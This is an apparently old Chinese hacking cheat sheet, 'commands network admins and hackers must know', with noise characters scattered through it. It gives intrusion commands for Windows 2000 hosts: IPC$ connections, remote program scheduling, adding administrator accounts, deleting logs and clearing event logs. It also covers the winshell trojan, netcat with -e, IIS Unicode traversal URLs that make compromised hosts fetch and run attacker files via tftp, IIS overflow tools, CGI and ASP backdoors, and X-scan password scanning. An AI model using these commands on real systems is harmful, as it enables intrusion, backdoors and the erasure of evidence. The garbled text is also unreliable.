网管和黑客都必须知道的命令
"U{,U`@? 常用的几条NET命令:
"y$ qrN- ^wJEfac (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
)|RZa|`-G p![&8i@ym (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
vU}: U)S s`c?: (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Hd0Xx}3& IBET'!j4" (查看远程主机时间) net time \\IP地址
ufPCx|x~ >)^NJ2Fd (定时启动某个程序) at \\IP地址 02:18 readme.exe
fL Nag~
o8{<qn| (查看共享) net view \\IP地址
BSKEh"f skR,-:"8 (查看netbios工作组列表) nbtstat -A IP地址
JpK[&/Ct 4.Z(:g (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
~^$MA$ /p :!O><eQw (这两条把自己增加到管理员组): net user 用户名 密码 /add
rz.IoQo 3] ^' net localgroup Administrators 用户名 /add
/cfHYvnz BI.V0@qZ (断开连接) net use \\IP地址\ipc$ /delete
Cw#V`70a G3dhM#! 扫尾:
mgVML&^ f=m/
-mAA del C:\winnt\system32\logfiles\*.*
lsY `c"NW> t77'fm del C:\winnt\ssytem32\config\*.evt
K]<u8eF 76u{!\Jo/{ del C:\winnt\system32\dtclog\*.*
^f|<R8 ` -~O/NX del C:\winnt\system32\*.log
o/1JO_41 RZh}: del C:\winnt\system32\*.txt
(6R4 \8z2 &@6 GI< del C:\winnt\*.txt
xNX'~B^4d j#3m|dQ del C:\winnt\*.log
TQJF+;% }g{_AiP
rv 一、netsvc.exe
S+ebO/$> b_vTGl1_6 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
4SR(->@ kA^A mfba netsvc /list \\IP地址
a,n93-m(m gz61FW netsvc schedule \\IP地址 /query
e$|VG*
d aZKXD! 4 netsvc \\IP地址 schedule /start
c'05{C J3B.-XJ+n 二、OpenTelnet.exe
_{Y$o'*#I gS$A 远程启动主机的Telnet服务,并绑定端口到7878,例如:
yM ,VrUh _-%d9@x OpenTelnet \\IP地址 用户名 密码 1 7878
M|r8KW~S) sRq U]i8l 然后就可以telnet到主机的7878端口,进入DOS方式下:
o56kp3b)b w$>3pQ8d telnet IP地址 7878
jBpVxv }OrYpZob 三、winshell.exe
(Es{l a G /U*yw5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
ETp'oh}? rk,p!}FqL p Path (查看winshell主程序的路径信息)
GN%(9N'W _7@z_i_c b reBoot (重新启动机器)
]l[2hy=
cV ?9e] d shutDown (关闭机器)
}bMWTT J+Bdz6lt s Shell (执行后你就会看到可爱的“C:\>”)
t5)J;0/ $]*d#`Sy{% x eXit (退出本次登录会话,此命令并不终止winshell的运行)
<xlm
K( Mm#[&j[Y CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
|ym%|
B H/J<Pd$p 四、3389登陆器,GUI方式登录远程主机的
U3F3((EYJ vg(K$o{BT 五、elsave.exe
JJ5C}`( frqJN 事件日志清除工具
kCA5|u T"!EK& elsave -s \\IP地址 -l "application" -C
l!IGc: ``9 GY elsave -s \\IP地址 -l "system" -C
O&'/J8 Q4wc-s4RN elsave -s \\IP地址 -l "security" -C
q#vlBL /6U
4S>'( 执行后成功清除应用程序日志,系统日志,安全日志
};sMU6e HmV />9 六、hbulot.exe
\ e,?rH -0 0}if7 开启win2kserver和winxp的3389服务
!kXeO6X@m Y&~M7TY b hbulot [/r]
s'L?;:)dyB wPnybb{ 使用/r表示安装完成后自动重起目标使设置生效。
*{5>XH{
x
Oh`2tc- 七、nc.exe(netcat.exe)
NHkL24ve 1q]c7" 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
%;O}FyP / L~u02? 想要连接到某处: nc [-options] hostname port[s] [ports] ...
}B ff,q H06Bj(Y! 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
G$5m$\K )#`H."Z 参数:
AyTx' u 6vp0*ww -e prog 程序重定向,一旦连接,就执行 [危险!!]
H?U't
09 9$O@`P\ -g gateway source-routing hop point[s], up to 8
)i!^]| $ PayV,8
-G num source-routing pointer: 4, 8, 12, ...
7>-yaL{ %j{.0H -h 帮助信息
QIV%6q+*R h^M^7S -i secs 延时的间隔
%^.P~s6 cwynd=^nC -l 监听模式,用于入站连接
%EI<@Ps8c C5n?0I9 -n 指定数字的IP地址,不能用hostname
5I,$EGG S()Za@ [a$ -o file 记录16进制的传输
s[c^"@HT eb!_ie"D -p port 本地端口号
hI~SAd
,#A mU G
%LM -r 任意指定本地及远程端口
8QF`,oXQO gb 4pN -s addr 本地源地址
Z2p> n`D +t]Xj1Q -u UDP模式
yP\Up ("Dv>&w9 -v 详细输出——用两个-v可得到更详细的内容
ZBc|438[ z[&s5" -w secs timeout的时间
]k+m=OR{/ )saR0{e0N -z 将输入输出关掉——用于扫描时
Q$=*aUU%G 八、TFTPD32.EXE
}<[Db}?9 +LzovC@^ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
LSkk;)'2K XDLEVSly7 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
c> G@+ kh?. K# 然后可以直接令文件运行:
G6O/(8 #":a6%0Q http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
JJf<*j^G 59!)j>f 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
fLB1)kTS 77We;a 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
.3wY\W8Dr- o3h -=t 一、一 Xscan命令行运行参数说明:
GLh]G( D1X{:#| 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
^M
Ey, BaL]mIx 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
A=`*r* v>-YuS xscan -file <主机列表文件名> <检测项目> [其他选项]
F?4Sz# ')o0O9/; 其中<检测项目> 含义如下:
xP@/9SM I@./${o -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
>XE`h9
BGqa-d -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
CC8k&u, aRwnRii -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
{Y_Nj`#BT (9GbG" -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
./w{L"E Hj~O49%j& -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
9<cOYY I;j3*lV_ [其他选项] 含义如下:
^ d\SPZ /V^sJ($V$~ -v: 显示详细扫描进度
3N<&u }kPVtSQ -p: 跳过Ping不通的主机
25em[Q:
4lz{G*u -o: 跳过没有检测到开放端口的主机
J{~Rxa \ 4gXY$`@ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10